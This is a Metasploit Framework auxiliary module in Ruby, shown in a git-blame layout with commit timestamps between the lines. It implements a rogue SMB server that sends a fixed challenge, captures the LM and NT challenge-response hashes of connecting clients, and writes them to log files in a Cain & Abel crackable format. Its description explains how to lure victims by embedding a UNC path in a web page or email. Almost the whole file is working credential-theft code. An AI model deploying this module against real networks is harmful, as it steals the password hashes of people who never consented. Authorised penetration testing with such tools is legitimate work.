2007-07-03 04:33:54 +00:00
|
|
|
##
|
2008-04-21 05:27:06 +00:00
|
|
|
# $Id$
|
2007-07-03 04:33:54 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
##
|
2010-03-27 22:13:50 +00:00
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
2007-07-03 04:33:54 +00:00
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
2009-04-13 14:33:26 +00:00
|
|
|
# http://metasploit.com/framework/
|
2007-07-03 04:33:54 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
class Metasploit3 < Msf::Auxiliary
|
2007-07-03 04:33:54 +00:00
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
include Msf::Exploit::Remote::SMBServer
|
2010-03-27 22:13:50 +00:00
|
|
|
|
2007-07-03 04:33:54 +00:00
|
|
|
def initialize
|
|
|
|
super(
|
2008-03-02 04:46:13 +00:00
|
|
|
'Name' => 'Authentication Capture: SMB',
|
2008-04-21 05:27:06 +00:00
|
|
|
'Version' => '$Revision$',
|
2007-07-03 04:33:54 +00:00
|
|
|
'Description' => %q{
|
|
|
|
This module provides a SMB service that can be used to
|
|
|
|
capture the challenge-response password hashes of SMB client
|
|
|
|
systems. All responses sent by this service have the same
|
2008-10-27 17:58:56 +00:00
|
|
|
hardcoded challenge string (\x11\x22\x33\x44\x55\x66\x77\x88),
|
2010-03-27 22:13:50 +00:00
|
|
|
allowing for easy cracking using Cain & Abel or L0phtcrack.
|
|
|
|
|
2007-12-31 03:03:08 +00:00
|
|
|
To exploit this, the target system must try to authenticate
|
2007-07-03 04:33:54 +00:00
|
|
|
to this module. The easiest way to force a SMB authentication attempt
|
2010-03-27 22:13:50 +00:00
|
|
|
is by embedding a UNC path (\\\\SERVER\\SHARE) into a web page or
|
|
|
|
email message. When the victim views the web page or email, their
|
2007-07-03 04:33:54 +00:00
|
|
|
system will automatically connect to the server specified in the UNC
|
|
|
|
share (the IP address of the system running this module) and attempt
|
|
|
|
to authenticate.
|
|
|
|
},
|
|
|
|
'Author' => 'hdm',
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Actions' =>
|
|
|
|
[
|
2010-09-20 08:06:27 +00:00
|
|
|
[ 'Sniffer' ]
|
2007-07-03 04:33:54 +00:00
|
|
|
],
|
2010-03-27 22:13:50 +00:00
|
|
|
'PassiveActions' =>
|
2007-07-03 04:33:54 +00:00
|
|
|
[
|
|
|
|
'Sniffer'
|
|
|
|
],
|
|
|
|
'DefaultAction' => 'Sniffer'
|
|
|
|
)
|
2010-03-27 22:13:50 +00:00
|
|
|
|
2007-07-03 04:33:54 +00:00
|
|
|
register_options(
|
|
|
|
[
|
2008-11-19 20:42:17 +00:00
|
|
|
OptString.new('LOGFILE', [ false, "The local filename to store the captured hashes", nil ]),
|
2010-09-21 00:05:08 +00:00
|
|
|
OptString.new('PWFILE', [ false, "The local filename to store the hashes in Cain&Abel format", nil ]),
|
2010-09-21 14:21:38 +00:00
|
|
|
OptString.new('CHALLENGE', [ true, "The 8 byte challenge ", "0011223344556677" ])
|
2010-03-27 22:13:50 +00:00
|
|
|
], self.class )
|
|
|
|
|
2007-07-03 04:33:54 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
2010-09-21 00:06:18 +00:00
|
|
|
if datastore['CHALLENGE'].to_s =~ /^([a-fA-F0-9]{16})$/
|
2010-09-21 00:05:08 +00:00
|
|
|
@challenge = datastore['CHALLENGE'].to_a.pack("H*")
|
|
|
|
else
|
2010-09-21 00:06:18 +00:00
|
|
|
print_error("CHALLENGE syntax must match 0011223344556677")
|
2010-09-21 00:05:08 +00:00
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2007-07-03 04:33:54 +00:00
|
|
|
exploit()
|
|
|
|
end
|
|
|
|
|
|
|
|
def smb_cmd_dispatch(cmd, c, buff)
|
|
|
|
smb = @state[c]
|
|
|
|
|
|
|
|
case cmd
|
|
|
|
when CONST::SMB_COM_NEGOTIATE
|
|
|
|
smb_cmd_negotiate(c, buff)
|
|
|
|
|
|
|
|
when CONST::SMB_COM_SESSION_SETUP_ANDX
|
|
|
|
smb_cmd_session_setup(c, buff)
|
2010-03-27 22:13:50 +00:00
|
|
|
|
2007-07-03 04:33:54 +00:00
|
|
|
when CONST::SMB_COM_TREE_CONNECT
|
|
|
|
print_status("Denying tree connect from #{smb[:name]}")
|
|
|
|
pkt = CONST::SMB_BASE_PKT.make_struct
|
|
|
|
pkt['Payload']['SMB'].v['Command'] = cmd
|
|
|
|
pkt['Payload']['SMB'].v['Flags1'] = 0x88
|
|
|
|
pkt['Payload']['SMB'].v['Flags2'] = 0xc001
|
|
|
|
pkt['Payload']['SMB'].v['ErrorClass'] = 0xc0000022
|
2010-03-27 22:13:50 +00:00
|
|
|
c.put(pkt.to_s)
|
|
|
|
|
|
|
|
else
|
2007-07-03 04:33:54 +00:00
|
|
|
print_status("Ignoring request from #{smb[:name]} (#{cmd})")
|
|
|
|
pkt = CONST::SMB_BASE_PKT.make_struct
|
|
|
|
pkt['Payload']['SMB'].v['Command'] = cmd
|
|
|
|
pkt['Payload']['SMB'].v['Flags1'] = 0x88
|
|
|
|
pkt['Payload']['SMB'].v['Flags2'] = 0xc001
|
|
|
|
pkt['Payload']['SMB'].v['ErrorClass'] = 0
|
2010-03-27 22:13:50 +00:00
|
|
|
c.put(pkt.to_s)
|
2007-07-03 04:33:54 +00:00
|
|
|
end
|
2010-03-27 22:13:50 +00:00
|
|
|
end
|
2007-07-03 04:33:54 +00:00
|
|
|
|
|
|
|
def smb_cmd_negotiate(c, buff)
|
|
|
|
smb = @state[c]
|
|
|
|
pkt = CONST::SMB_NEG_PKT.make_struct
|
|
|
|
pkt.from_s(buff)
|
2010-03-27 22:13:50 +00:00
|
|
|
|
2007-07-03 04:33:54 +00:00
|
|
|
# Record the remote process ID
|
|
|
|
smb[:process_id] = pkt['Payload']['SMB'].v['ProcessID']
|
|
|
|
|
|
|
|
# The hardcoded challenge value
|
2010-03-27 22:13:50 +00:00
|
|
|
challenge = @challenge
|
2007-07-03 04:33:54 +00:00
|
|
|
|
|
|
|
group = ''
|
|
|
|
machine = smb[:nbsrc]
|
2010-03-27 22:13:50 +00:00
|
|
|
|
2007-07-03 04:33:54 +00:00
|
|
|
dialects = pkt['Payload'].v['Payload'].gsub(/\x00/, '').split(/\x02/).grep(/^\w+/)
|
|
|
|
# print_status("Negotiation from #{smb[:name]}: #{dialects.join(", ")}")
|
2010-03-27 22:13:50 +00:00
|
|
|
|
|
|
|
dialect =
|
|
|
|
dialects.index("NT LM 0.12") ||
|
2007-07-03 04:33:54 +00:00
|
|
|
dialects.length-1
|
|
|
|
|
|
|
|
pkt = CONST::SMB_NEG_RES_NT_PKT.make_struct
|
|
|
|
smb_set_defaults(c, pkt)
|
|
|
|
|
|
|
|
time_hi, time_lo = UTILS.time_unix_to_smb(Time.now.to_i)
|
|
|
|
|
|
|
|
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NEGOTIATE
|
|
|
|
pkt['Payload']['SMB'].v['Flags1'] = 0x88
|
|
|
|
pkt['Payload']['SMB'].v['Flags2'] = 0xc001
|
|
|
|
pkt['Payload']['SMB'].v['WordCount'] = 17
|
|
|
|
pkt['Payload'].v['Dialect'] = dialect
|
|
|
|
pkt['Payload'].v['SecurityMode'] = 3
|
|
|
|
pkt['Payload'].v['MaxMPX'] = 2
|
2010-03-27 22:13:50 +00:00
|
|
|
pkt['Payload'].v['MaxVCS'] = 1
|
2007-07-03 04:33:54 +00:00
|
|
|
pkt['Payload'].v['MaxBuff'] = 4356
|
|
|
|
pkt['Payload'].v['MaxRaw'] = 65536
|
|
|
|
pkt['Payload'].v['Capabilities'] = 0xe3fd # 0x80000000 for extended
|
|
|
|
pkt['Payload'].v['ServerTime'] = time_lo
|
|
|
|
pkt['Payload'].v['ServerDate'] = time_hi
|
|
|
|
pkt['Payload'].v['Timezone'] = 0x0
|
2010-03-27 22:13:50 +00:00
|
|
|
|
|
|
|
|
2007-07-03 04:33:54 +00:00
|
|
|
pkt['Payload'].v['SessionKey'] = 0
|
|
|
|
pkt['Payload'].v['KeyLength'] = 8
|
2010-03-27 22:13:50 +00:00
|
|
|
|
|
|
|
pkt['Payload'].v['Payload'] =
|
|
|
|
challenge +
|
2007-07-03 04:33:54 +00:00
|
|
|
Rex::Text.to_unicode(group) + "\x00\x00" +
|
|
|
|
Rex::Text.to_unicode(machine) + "\x00\x00"
|
|
|
|
|
|
|
|
c.put(pkt.to_s)
|
|
|
|
end
|
2010-03-27 22:13:50 +00:00
|
|
|
|
2007-07-03 04:33:54 +00:00
|
|
|
def smb_cmd_session_setup(c, buff)
|
|
|
|
smb = @state[c]
|
|
|
|
pkt = CONST::SMB_SETUP_NTLMV1_PKT.make_struct
|
|
|
|
pkt.from_s(buff)
|
2010-03-27 22:13:50 +00:00
|
|
|
|
2007-07-03 04:33:54 +00:00
|
|
|
|
|
|
|
# Record the remote multiplex ID
|
|
|
|
smb[:multiplex_id] = pkt['Payload']['SMB'].v['MultiplexID']
|
2010-03-27 22:13:50 +00:00
|
|
|
|
|
|
|
lm_len = pkt['Payload'].v['PasswordLenLM']
|
|
|
|
nt_len = pkt['Payload'].v['PasswordLenNT']
|
|
|
|
|
2007-07-03 04:33:54 +00:00
|
|
|
lm_hash = pkt['Payload'].v['Payload'][0, lm_len].unpack("H*")[0]
|
|
|
|
nt_hash = pkt['Payload'].v['Payload'][lm_len, nt_len].unpack("H*")[0]
|
2010-03-27 22:13:50 +00:00
|
|
|
|
|
|
|
|
2007-07-03 04:33:54 +00:00
|
|
|
buff = pkt['Payload'].v['Payload']
|
|
|
|
buff.slice!(0, lm_len + nt_len)
|
|
|
|
names = buff.split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
|
2010-03-27 22:13:50 +00:00
|
|
|
|
2007-07-03 04:33:54 +00:00
|
|
|
smb[:username] = names[0]
|
|
|
|
smb[:domain] = names[1]
|
|
|
|
smb[:peer_os] = names[2]
|
|
|
|
smb[:peer_lm] = names[3]
|
2010-03-27 22:13:50 +00:00
|
|
|
|
|
|
|
|
2007-07-03 04:33:54 +00:00
|
|
|
# Clean up the data for loggging
|
|
|
|
if (smb[:username] == "")
|
|
|
|
smb[:username] = nil
|
|
|
|
end
|
2010-03-27 22:13:50 +00:00
|
|
|
|
2007-07-03 04:33:54 +00:00
|
|
|
if (smb[:domain] == "")
|
|
|
|
smb[:domain] = nil
|
|
|
|
end
|
|
|
|
|
2010-08-18 00:58:20 +00:00
|
|
|
if smb[:domain]
|
|
|
|
smb[:fullname] = "#{smb[:domain]}/#{smb[:username]}"
|
|
|
|
else
|
|
|
|
smb[:fullname] = smb[:username].to_s
|
|
|
|
end
|
|
|
|
|
2008-10-27 17:58:56 +00:00
|
|
|
if (lm_hash == "52d536dbcefa63b9101f9c7a9d0743882f85252cc731bb25" or lm_hash == "" or lm_hash == "00")
|
2007-07-03 04:33:54 +00:00
|
|
|
lm_hash = nil
|
|
|
|
end
|
|
|
|
|
2008-10-27 17:58:56 +00:00
|
|
|
if (nt_hash == "eefabc742621a883aec4b24e0f7fbf05e17dc2880abe07cc" or nt_hash == "")
|
2007-07-03 04:33:54 +00:00
|
|
|
nt_hash = nil
|
|
|
|
end
|
2010-03-27 22:13:50 +00:00
|
|
|
|
2007-07-03 04:33:54 +00:00
|
|
|
print_status(
|
|
|
|
"Captured #{smb[:name]} #{smb[:domain]}\\#{smb[:username]} " +
|
|
|
|
"LMHASH:#{lm_hash ? lm_hash : "<NULL>"} NTHASH:#{nt_hash ? nt_hash : "<NULL>"} " +
|
|
|
|
"OS:#{smb[:peer_os]} LM:#{smb[:peer_lm]}"
|
|
|
|
)
|
2010-03-27 22:13:50 +00:00
|
|
|
|
2008-03-02 04:46:13 +00:00
|
|
|
report_auth_info(
|
|
|
|
:host => smb[:ip],
|
2010-08-18 00:58:20 +00:00
|
|
|
:port => datastore['SRVPORT'],
|
|
|
|
:sname => 'smb_challenge',
|
|
|
|
:user => smb[:fullname],
|
|
|
|
:pass => ( nt_hash ? nt_hash : "<NULL>" ) + ":" + (lm_hash ? lm_hash : "<NULL>" ),
|
|
|
|
:type => "smb_hash",
|
|
|
|
:proof => "NAME=#{smb[:nbsrc]} DOMAIN=#{smb[:domain]} OS=#{smb[:peer_os]}",
|
|
|
|
:active => true
|
2008-03-02 04:46:13 +00:00
|
|
|
)
|
2010-03-27 22:13:50 +00:00
|
|
|
|
2008-03-02 04:46:13 +00:00
|
|
|
report_note(
|
|
|
|
:host => smb[:ip],
|
|
|
|
:type => "smb_peer_os",
|
|
|
|
:data => smb[:peer_os]
|
2008-03-02 08:03:27 +00:00
|
|
|
) if (smb[:peer_os] and smb[:peer_os].strip.length > 0)
|
2008-03-02 04:46:13 +00:00
|
|
|
|
|
|
|
report_note(
|
|
|
|
:host => smb[:ip],
|
|
|
|
:type => "smb_peer_lm",
|
|
|
|
:data => smb[:peer_lm]
|
2008-03-02 08:03:27 +00:00
|
|
|
) if (smb[:peer_lm] and smb[:peer_lm].strip.length > 0)
|
2008-03-02 04:46:13 +00:00
|
|
|
|
|
|
|
report_note(
|
|
|
|
:host => smb[:ip],
|
|
|
|
:type => "smb_domain",
|
|
|
|
:data => smb[:domain]
|
2008-03-02 08:03:27 +00:00
|
|
|
) if (smb[:domain] and smb[:domain].strip.length > 0)
|
2010-03-27 22:13:50 +00:00
|
|
|
|
|
|
|
|
|
|
|
if(datastore['LOGFILE'])
|
2010-07-01 23:33:07 +00:00
|
|
|
fd = File.open(datastore['LOGFILE'], "ab")
|
2008-11-19 20:42:17 +00:00
|
|
|
fd.puts(
|
|
|
|
[
|
|
|
|
smb[:nbsrc],
|
|
|
|
smb[:ip],
|
|
|
|
smb[:username] ? smb[:username] : "<NULL>",
|
|
|
|
smb[:domain] ? smb[:domain] : "<NULL>",
|
|
|
|
smb[:peer_os],
|
|
|
|
nt_hash ? nt_hash : "<NULL>",
|
|
|
|
lm_hash ? lm_hash : "<NULL>",
|
|
|
|
Time.now.to_s
|
|
|
|
].join(":").gsub(/\n/, "\\n")
|
|
|
|
)
|
|
|
|
fd.close
|
|
|
|
end
|
2010-03-27 22:13:50 +00:00
|
|
|
|
2008-11-19 20:42:17 +00:00
|
|
|
if(datastore['PWFILE'] and smb[:username] and lm_hash)
|
2010-07-01 23:45:49 +00:00
|
|
|
fd = File.open(datastore['PWFILE'], "ab")
|
2008-11-19 20:42:17 +00:00
|
|
|
fd.puts(
|
|
|
|
[
|
|
|
|
smb[:username],
|
|
|
|
smb[:domain] ? smb[:domain] : "NULL",
|
|
|
|
@challenge.unpack("H*")[0],
|
|
|
|
lm_hash ? lm_hash : "0" * 32,
|
|
|
|
nt_hash ? nt_hash : "0" * 32
|
|
|
|
].join(":").gsub(/\n/, "\\n")
|
|
|
|
)
|
2010-03-27 22:13:50 +00:00
|
|
|
fd.close
|
|
|
|
|
2008-11-19 20:42:17 +00:00
|
|
|
end
|
2010-03-27 22:13:50 +00:00
|
|
|
|
2007-07-03 04:33:54 +00:00
|
|
|
pkt = CONST::SMB_BASE_PKT.make_struct
|
|
|
|
smb_set_defaults(c, pkt)
|
2010-03-27 22:13:50 +00:00
|
|
|
|
2007-07-03 04:33:54 +00:00
|
|
|
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_SESSION_SETUP_ANDX
|
|
|
|
pkt['Payload']['SMB'].v['Flags1'] = 0x88
|
|
|
|
pkt['Payload']['SMB'].v['Flags2'] = 0xc001
|
|
|
|
pkt['Payload']['SMB'].v['ErrorClass'] = 0xC0000022
|
2010-03-27 22:13:50 +00:00
|
|
|
c.put(pkt.to_s)
|
2007-07-03 04:33:54 +00:00
|
|
|
end
|
2010-03-27 22:13:50 +00:00
|
|
|
|
|
|
|
|
2007-07-03 04:33:54 +00:00
|
|
|
def smb_cmd_close(c, buff)
|
|
|
|
end
|
|
|
|
|
|
|
|
def smb_cmd_create(c, buff)
|
|
|
|
end
|
|
|
|
|
|
|
|
def smb_cmd_delete(c, buff)
|
|
|
|
end
|
|
|
|
|
|
|
|
def smb_cmd_nttrans(c, buff)
|
|
|
|
end
|
|
|
|
|
|
|
|
def smb_cmd_open(c, buff)
|
|
|
|
end
|
|
|
|
|
|
|
|
def smb_cmd_read(c, buff)
|
|
|
|
end
|
|
|
|
|
|
|
|
def smb_cmd_trans(c, buff)
|
|
|
|
end
|
|
|
|
|
|
|
|
def smb_cmd_tree_connect(c, buff)
|
|
|
|
end
|
|
|
|
|
|
|
|
def smb_cmd_tree_disconnect(c, buff)
|
|
|
|
end
|
|
|
|
|
|
|
|
def smb_cmd_write(c, buff)
|
|
|
|
end
|
|
|
|
|
|
|
|
|
2008-10-26 21:53:36 +00:00
|
|
|
end
|
2010-03-27 22:13:50 +00:00
|
|
|
|